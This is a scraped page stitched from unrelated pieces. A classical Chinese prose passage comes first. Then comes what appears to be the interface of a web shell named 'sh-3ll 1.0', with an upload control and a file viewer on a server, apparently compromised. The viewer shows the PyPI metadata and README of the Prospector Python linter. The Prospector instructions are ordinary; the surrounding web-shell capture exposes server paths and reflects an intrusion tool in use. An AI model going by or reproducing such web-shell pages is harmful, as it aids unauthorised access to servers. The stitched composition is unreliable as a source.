晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 sh-3ll

HOME


sh-3ll 1.0
DIR:/opt/cloudlinux/venv/lib/python3.11/site-packages/prospector-1.10.2.dist-info/
Upload File :
Current File : //opt/cloudlinux/venv/lib/python3.11/site-packages/prospector-1.10.2.dist-info/METADATA
Metadata-Version: 2.1
Name: prospector
Version: 1.10.2
Summary: Prospector is a tool to analyse Python code by aggregating the result of other tools.
Home-page: http://prospector.readthedocs.io
License: GPLv2+
Keywords: pylint,prospector,static code analysis
Author: Carl Crowder
Author-email: git@carlcrowder.com
Maintainer: Carl Crowder
Maintainer-email: git@carlcrowder.com
Requires-Python: >=3.7.2,<4.0
Classifier: Development Status :: 5 - Production/Stable
Classifier: Environment :: Console
Classifier: Intended Audience :: Developers
Classifier: License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)
Classifier: License :: Other/Proprietary License
Classifier: Operating System :: Unix
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.8
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.7
Classifier: Programming Language :: Python :: 3.8
Classifier: Programming Language :: Python :: 3.9
Classifier: Topic :: Software Development :: Quality Assurance
Provides-Extra: with_bandit
Provides-Extra: with_everything
Provides-Extra: with_mypy
Provides-Extra: with_pyright
Provides-Extra: with_pyroma
Provides-Extra: with_vulture
Requires-Dist: GitPython (>=3.1.27,<4.0.0)
Requires-Dist: PyYAML
Requires-Dist: bandit (>=1.5.1); extra == "with_bandit" or extra == "with_everything"
Requires-Dist: dodgy (>=0.2.1,<0.3.0)
Requires-Dist: flake8 (<6.0.0)
Requires-Dist: mccabe (>=0.7.0,<0.8.0)
Requires-Dist: mypy (>=0.600); extra == "with_mypy" or extra == "with_everything"
Requires-Dist: packaging
Requires-Dist: pep8-naming (>=0.3.3,<=0.10.0)
Requires-Dist: pycodestyle (>=2.9.0)
Requires-Dist: pydocstyle (>=2.0.0)
Requires-Dist: pyflakes (>=2.2.0,<3)
Requires-Dist: pylint (>=2.8.3)
Requires-Dist: pylint-celery (==0.3)
Requires-Dist: pylint-django (>=2.5,<2.6)
Requires-Dist: pylint-flask (==0.6)
Requires-Dist: pylint-plugin-utils (>=0.7,<0.8)
Requires-Dist: pyright (>=1.1.3); extra == "with_pyright" or extra == "with_everything"
Requires-Dist: pyroma (>=2.4); extra == "with_pyroma" or extra == "with_everything"
Requires-Dist: requirements-detector (>=1.2.0)
Requires-Dist: setoptconf-tmp (>=0.3.1,<0.4.0)
Requires-Dist: toml (>=0.10.2,<0.11.0)
Requires-Dist: vulture (>=1.5); extra == "with_vulture" or extra == "with_everything"
Project-URL: Repository, https://github.com/PyCQA/prospector
Description-Content-Type: text/x-rst

prospector
==========

.. image:: https://img.shields.io/pypi/v/prospector.svg
   :target: https://pypi.python.org/pypi/prospector
   :alt: Latest Version of Prospector
.. image:: https://github.com/PyCQA/prospector/actions/workflows/tests.yml/badge.svg
   :target: https://github.com/PyCQA/prospector/actions/workflows/tests.yml
   :alt: Build Status
.. image:: https://img.shields.io/coveralls/PyCQA/prospector.svg?style=flat
   :target: https://coveralls.io/r/PyCQA/prospector
   :alt: Test Coverage
.. image:: https://readthedocs.org/projects/prospector/badge/?version=latest
   :target: https://prospector.readthedocs.io/
   :alt: Documentation


About
-----

Prospector is a tool to analyse Python code and output information about
errors, potential problems, convention violations and complexity.

It brings together the functionality of other Python analysis tools such as
`Pylint <https://docs.pylint.org/>`_,
`pycodestyle <https://pycodestyle.pycqa.org/>`_,
and `McCabe complexity <https://pypi.python.org/pypi/mccabe>`_.
See the `Supported Tools <https://prospector.readthedocs.io/en/latest/supported_tools.html>`_
documentation section for a complete list.

The primary aim of Prospector is to be useful 'out of the box'. A common complaint of other
Python analysis tools is that it takes a long time to filter through which errors are relevant
or interesting to your own coding style. Prospector provides some default profiles, which
hopefully will provide a good starting point and will be useful straight away, and adapts
the output depending on the libraries your project uses.

Installation
------------

Prospector can be installed from PyPI using ``pip`` by running the following command::

    pip install prospector

Optional dependencies for Prospector, such as ``pyroma`` can also be installed by running::

    pip install prospector[with_pyroma]

Some shells (such as ``Zsh``, the default shell of macOS Catalina) require brackets to be escaped::

    pip install prospector\[with_pyroma\]

For a list of all of the optional dependencies, see the optional extras section on the ReadTheDocs
page on `Supported Tools Extras <https://prospector.readthedocs.io/en/latest/supported_tools.html#optional-extras>`_.

For local development, `poetry <https://python-poetry.org/>`_ is used. Check out the code, then run::

    poetry install

And for extras::

    poetry install -E with_everything

For more detailed information on installing the tool, see the
`installation section <https://prospector.readthedocs.io/en/latest/#installation>`_ of the tool's main page
on ReadTheDocs.

Documentation
-------------

Full `documentation is available at ReadTheDocs <https://prospector.readthedocs.io>`_.

Usage
-----

Simply run prospector from the root of your project::

    prospector

This will output a list of messages pointing out potential problems or errors, for example::

    prospector.tools.base (prospector/tools/base.py):
        L5:0 ToolBase: pylint - R0922
        Abstract class is only referenced 1 times

Options
```````

Run ``prospector --help`` for a full list of options and their effects.

Output Format
~~~~~~~~~~~~~

The default output format of ``prospector`` is designed to be human readable. For parsing
(for example, for reporting), you can use the ``--output-format json`` flag to get JSON-formatted
output.

Profiles
~~~~~~~~

Prospector is configurable using "profiles". These are composable YAML files with directives to
disable or enable tools or messages. For more information, read
`the documentation about profiles <https://prospector.readthedocs.io/en/latest/profiles.html>`_.

If your code uses frameworks and libraries
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Often tools such as pylint find errors in code which is not an error, for example due to attributes of classes being
created at run time by a library or framework used by your project.
For example, by default, pylint will generate an error for Django models when accessing ``objects``, as the
``objects`` attribute is not part of the ``Model`` class definition.

Prospector mitigates this by providing an understanding of these frameworks to the underlying tools.

Prospector will try to intuit which libraries your project uses by
`detecting dependencies <https://github.com/landscapeio/requirements-detector>`_ and automatically turning on
support for the requisite libraries. You can see which adaptors were run in the metadata section of the report.

If Prospector does not correctly detect your project's dependencies, you can specify them manually from the commandline::

    prospector --uses django celery

Additionally, if Prospector is automatically detecting a library that you do not in fact use, you can turn
off autodetection completely::

    prospector --no-autodetect

Note that as far as possible, these adaptors have been written as plugins or augmentations for the underlying
tools so that they can be used without requiring Prospector. For example, the Django support is available as a pylint plugin.

Strictness
~~~~~~~~~~

Prospector has a configurable 'strictness' level which will determine how harshly it searches for errors::

    prospector --strictness high

Possible values are ``verylow``, ``low``, ``medium``, ``high``, ``veryhigh``.

Prospector does not include documentation warnings by default, but you can turn
this on using the ``--doc-warnings`` flag.

pre-commit
----------

If you'd like Prospector to be run automatically when making changes to files in your Git
repository, you can install `pre-commit <https://pre-commit.com/>`_ and add the following
text to your repositories' ``.pre-commit-config.yaml``::

    repos:
    -   repo: https://github.com/PyCQA/prospector
        rev: 1.10.0 # The version of Prospector to use, if not 'master' for latest
        hooks:
        -   id: prospector

This only installs base prospector - if you also use optional tools, for example bandit and/or mypy, then you can add
them to the hook configuration like so::

    repos:
    -   repo: https://github.com/PyCQA/prospector
        rev: 1.10.0
        hooks:
        -   id: prospector
            additional_dependencies:
            - ".[with_mypy,with_bandit]"
          - args: [
            '--with-tool=mypy',
            '--with-tool=bandit',
            ]

Additional dependencies can be `individually configured <https://prospector.landscape.io/en/master/profiles.html#individual-configuration-options>`_ in your `prospector.yml` file ::

    # https://bandit.readthedocs.io/en/latest/config.html
    bandit:
    options:
        skips:
        - B201
        - B601
        - B610
        - B611
        - B703

    # https://mypy.readthedocs.io/en/stable/command_line.html
    mypy:
    options:
        ignore-missing-imports: true

For prospector options which affect display only - those which are not configurable using a profile - these can be
added as command line arguments to the hook. For example::

    repos:
    -   repo: https://github.com/PyCQA/prospector
        rev: 1.10.0
        hooks:
        -   id: prospector
            additional_dependencies:
            -   ".[with_mypy,with_bandit]"
            args:
            -   --with-tool=mypy
            -   --with-tool=bandit
            -   --summary-only
            -   --zero-exit



License
-------

Prospector is available under the GPLv2 License.